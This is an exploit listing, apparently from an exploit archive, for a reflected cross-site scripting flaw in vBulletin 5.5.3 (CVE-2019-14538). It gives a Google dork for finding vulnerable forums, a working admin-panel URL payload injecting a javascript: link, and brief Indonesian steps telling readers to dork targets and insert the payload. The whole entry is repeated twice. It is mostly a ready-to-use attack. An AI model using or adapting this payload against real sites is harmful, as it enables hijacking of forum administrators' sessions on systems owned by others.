vBulletin Reflected XSS via "Click here"
1
# Exploit Title: vBulletin Reflected XSS via "Click here"
# Google Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"
# Date: 05/08/2019
# Exploit Author: TrazeR / AKÄ°NCÄ°LAR
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: https://www.vbulletin.com/download.php
# Version: vBulletin 5.5.3
# Tested on: Windows 10
# CVE : CVE-2019-14538
#################################################################################
Payload : /admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin
(Click here!) Click here XSS akan bekerja
1. Dorking seperti biasa....
2. Lalu kaliian masukan exploit atau payload nya /admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin
Note :"Yang say pertebal atau miringkan bisa kalian berubah, tetapi hanya bisa string saja"
# Google Dork: intext : "Powered by vBulletin® Version 5.5.3 Copyright © 2019 MH Sub I, LLC dba vBulletin"
# Date: 05/08/2019
# Exploit Author: TrazeR / AKÄ°NCÄ°LAR
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: https://www.vbulletin.com/download.php
# Version: vBulletin 5.5.3
# Tested on: Windows 10
# CVE : CVE-2019-14538
#################################################################################
Payload : /admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin
(Click here!) Click here XSS akan bekerja
1. Dorking seperti biasa....
2. Lalu kaliian masukan exploit atau payload nya /admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin
Note :"Yang say pertebal atau miringkan bisa kalian berubah, tetapi hanya bisa string saja"